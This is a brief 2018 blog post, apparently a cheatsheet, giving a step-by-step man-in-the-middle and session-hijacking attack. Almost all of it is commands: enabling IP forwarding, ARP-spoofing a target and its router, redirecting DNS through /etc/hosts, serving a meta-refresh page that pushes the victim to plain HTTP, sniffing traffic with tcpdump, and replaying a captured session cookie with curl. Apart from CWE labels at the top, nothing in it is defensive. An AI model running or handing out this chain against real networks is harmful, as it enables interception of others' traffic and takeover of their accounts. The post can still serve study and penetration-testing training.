Thursday, August 9, 2018

Man-in-the-Middle and Session Hijacking Cheatsheet

Cheatsheet for MITM Session Hijacking

Man-in-the-Middle: CWE-300 (Channel Accessible by Non-Endpoint ('Man-in-the-Middle'))
Session Hijacking: CWE-384 (Session Fixation)

Enable IP Forwarding

    user@host:~$ sysctl -w net.ipv4.ip_forward=1

ARP Spoof the Target

    user@host:~$ sudo arpspoof <target ip> -t <router ip>
    user@host:~$ sudo arpspoof <router ip> -t <target ip>

Redirect DNS to Own Address

    user@host:~$ vim /etc/hosts
    ...
    127.0.0.1      <target DNS>
    ...

Redirect the Target to the HTTP Version of the Site

    user@host:~$ service apache2 start
    user@host:~$ vim /var/www/index.html
    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="refresh" content="0; url=http://<target site>/" />
    </head>
    <body>
    <p>Redirecting...</p>
    </body>
    </html>

Capture Packets

    user@host:~$ tcpdump -A | grep <target ip>

Use the Session Cookie

    user@host:~$ curl -v --cookie "<cookie>=<value>" <target site>
